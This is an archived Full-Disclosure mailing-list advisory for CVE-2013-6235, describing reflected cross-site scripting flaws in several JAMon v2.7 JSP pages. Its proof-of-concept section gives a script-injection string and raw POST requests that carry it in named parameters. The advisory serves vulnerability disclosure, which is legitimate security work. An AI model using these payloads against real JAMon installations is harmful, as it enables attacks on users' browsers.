| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <52E16934.3040703@gmail.com>
Date: Thu, 23 Jan 2014 20:10:44 +0100
From: Christian Catalano <ch.catalano@...il.com>
To: OSVDB Mods <moderators@...db.org>, full-disclosure@...ts.grok.org.uk,
bugtraq@...urityfocus.com, Secunia Research <vuln@...unia.com>,
submit@...sec.com, submissions@...ketstormsecurity.com,
submit@...7day.com, vuldb@...urityfocus.com, submit@...ecurity.com
Subject: [CVE-2013-6235] - Multiple Reflected XSS
vulnerabilities in JAMon v2.7
###################################################
01. ### Advisory Information ###
Title: Multiple Reflected XSS vulnerabilities in JAMon
Date published: 2013-01-23
Date of last update: 2013-01-23
Vendors contacted: JAMon v 2.7
Discovered by: Christian Catalano
Severity: Low
02. ### Vulnerability Information ###
CVE reference: CVE-2013-6235
CVSS v2 Base Score: 4.3
CVSS v2 Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Component/s: JAMon v 2.7
Class: Input Manipulation
03. ### Introduction ###
The Java Application Monitor (JAMon) is a free, simple, high
performance, thread safe, Java API that allows developers to easily
monitor production applications.
http://jamonapi.sourceforge.net
04. ### Vulnerability Description ###
Multiple Non-Persistent Cross-Site Scripting vulnerabilities have been
identified in the JAMon web application.
JAMon contains a flaw that allows multiple reflected cross-site
scripting (XSS) attacks.
This flaw exists because certain pages do not validate input before
returning it to users.
+------------------------------+-------------------+
|-Vulnerable module(s)--------and----parameter(s)--|
+------------------------------+-------------------+
|mondetail.jsp --------------------ArraySQL--------|
|mondetail.jsp --------------------listenertype----|
|mondetail.jsp --------------------currentlistener-|
|jamonadmin.jsp -------------------ArraySQL--------|
|sql.jsp---------------------------ArraySQL--------|
|exceptions.jsp--------------------ArraySQL--------|
+------------------------------+-------------------+
05. ### Technical Description / Proof of Concept Code ###
05.01) Malicious Request ("ArraySQL" parameter):
The vulnerability is located in the ' Filter (optional) ' input field
upon submission to the pages
http://localhost/jamon/mondetail.jsp
http://localhost/jamon/ jamonadmin.jsp
http://localhost/jamon/ sql.jsp
http://localhost/jamon/ exceptions.jsp
The application does not validate the 'ArraySQL' parameter upon
submission to the *.jsp scripts.
The attacker can inject the malicious javascript code:
1-->1<ScRiPt >alert('XSS')</ScRiPt><!--
in the ' Filter (optional) ' input field and click on GO! button.
05.02) Malicious Request ("listenertype " parameter)
POST /jamon/mondetail.jsp HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101
Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/jamon/mondetail.jsp
Cookie: JSESSIONID=3EFF8AFB46683B03B2CD73663A97FFDD.jboss1; ROUTEID=.jboss1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 209
listenertype=1-->1<ScRiPt>alert('XSS')</ScRiPt><!--¤tlistener=JAMonBufferListener&outputTypeValue=html&formatterValue=%23%2C%23%23%23&bufferSize=No+Action&TextSize=&highlight=&ArraySQL=&actionSbmt=Go+%21
05.03) Malicious Request ("currentlistener " parameter)
POST /jamon/mondetail.jsp HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101
Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/jamon/mondetail.jsp
Cookie: JSESSIONID=3EFF8AFB46683B03B2CD73663A97FFDD.jboss1; ROUTEID=.jboss1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 195
listenertype=value¤tlistener=1-->1<ScRiPt>alert('XSS')</ScRiPt><!--&outputTypeValue=html&formatterValue=%23%2C%23%23%23&bufferSize=No+Action&TextSize=&highlight=&ArraySQL=&actionSbmt=Go+%21
06. ### Business Impact ###
This may allow an attacker to create a specially crafted request that
would execute arbitrary script code in a user's browser within the trust
relationship between their browser and the server.
07. ### Systems Affected ###
This vulnerability was tested against: JAMon v2.7
Older versions are probably affected too, but they were not checked.
08. ### Vendor Information, Solutions and Workarounds ###
Currently, there are no known upgrades or patches to correct this
vulnerability.
09. ### Credits ###
This vulnerability has been discovered by:
Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com
10. ### Vulnerability History ###
October 18th, 2013: Vulnerability identification
October 22th, 2013: Vendor notification [JAMon]
December 10th, 2013: Vulnerability confirmation [JAMonI]
January 23th, 2014: Vulnerability disclosure
11. ### Disclaimer ###
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of
this information.
###################################################
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists